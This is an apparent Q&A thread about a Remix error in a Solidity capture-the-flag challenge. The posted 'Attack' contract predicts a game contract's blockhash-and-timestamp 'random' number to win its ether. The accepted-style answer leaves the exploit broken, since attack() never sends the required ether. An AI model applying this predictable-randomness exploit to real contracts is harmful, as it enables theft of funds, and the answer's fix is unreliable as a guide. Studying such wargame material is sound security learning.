# Why am I getting this error "Gas estimation errored with the following message (see below)"?

Tags: solidity, remix

My remix keep alerting "Gas estimation errored with the following message (see below). The transaction execution will likely fail. Do you want to force sending? execution reverted". Can you guys help me find which part that im missing.

```
 pragma solidity ^0.4.21;

contract GuessTheNewNumberChallenge {
    function GuessTheNewNumberChallenge() public payable {
        require(msg.value == 1 ether);
    }

    function isComplete() public view returns (bool) {
        return address(this).balance == 0;
    }

    function guess(uint8 n) public payable {
        require(msg.value == 1 ether);
        uint8 answer = uint8(keccak256(block.blockhash(block.number - 1), now));

        if (n == answer) {
            msg.sender.transfer(2 ether);
        }
    }
}

contract Attack {
    address vt = 0x2417929C9AE5884a754Cf1f77FA5FaBDDC9ce92A;
    GuessTheNewNumberChallenge gn = GuessTheNewNumberChallenge(vt);
    function attack() public {
        uint8 answer = uint8(keccak256(block.blockhash(block.number - 1), now));
        gn.guess(answer);
    }
}
```

Answer (score 0):

You must to specificy in Attack smart contract the GuessTheNewNumberChallenge
smart contract address for use its functions. To resolve this problem try this:

```
pragma solidity ^0.4.21;

contract GuessTheNewNumberChallenge {

    function GuessTheNewNumberChallenge() public payable {
        require(msg.value == 1 ether);
    }

    function isComplete() public view returns (bool) {
        return address(this).balance == 0;
    }

    function guess(uint8 n) public payable {
        require(msg.value == 1 ether);
        uint8 answer = uint8(keccak256(block.blockhash(block.number - 1), now));

        if (n == answer) {
            msg.sender.transfer(2 ether);
        }
    }
}

contract Attack {
    // I declare variable refers to GuessTheNewNumberChallenge
    GuessTheNewNumberChallenge private gn;

    // I set into constructor about this smart contract the address where GuessTheNewNumberChallenge deployed.
    // And when the instance is complete, you can use the GuessTheNewNumberChallenge functions. 
    constructor(address gtncAddress) public {
        gn = GuessTheNewNumberChallenge(gtncAddress);
    } 

    function attack() public {
        uint8 answer = uint8(keccak256(block.blockhash(block.number - 1), now));
        gn.guess(answer);
    }
}
```

I put some comments into smart contracts.

Comment: Really big thanks!! I copied all your code and ran on Remix but it's still not working. I just try to remove Attack contract out and it worked normally. But when I started Attack contract. It was error immediately.